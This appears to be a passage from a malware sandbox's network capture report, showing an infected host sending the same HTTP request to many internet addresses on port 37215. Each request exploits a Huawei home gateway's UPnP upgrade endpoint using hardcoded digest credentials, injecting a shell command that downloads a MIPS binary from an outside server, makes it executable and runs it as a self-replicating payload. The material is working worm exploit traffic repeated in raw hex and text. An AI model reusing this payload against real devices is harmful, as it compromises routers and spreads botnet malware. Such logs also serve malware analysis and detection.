                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1833192.168.2.2340258197.212.78.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549197912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1834192.168.2.235991041.205.99.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549216032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1835192.168.2.2348068197.142.140.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549242020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1836192.168.2.2354380155.90.220.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549287081 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1837192.168.2.235632875.48.229.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549328089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1838192.168.2.234757041.126.116.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549331903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1839192.168.2.235403837.131.95.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549350977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1840192.168.2.235146824.161.216.13837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549413919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1841192.168.2.2358414157.210.212.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549416065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1842192.168.2.2359498157.65.167.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549427032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
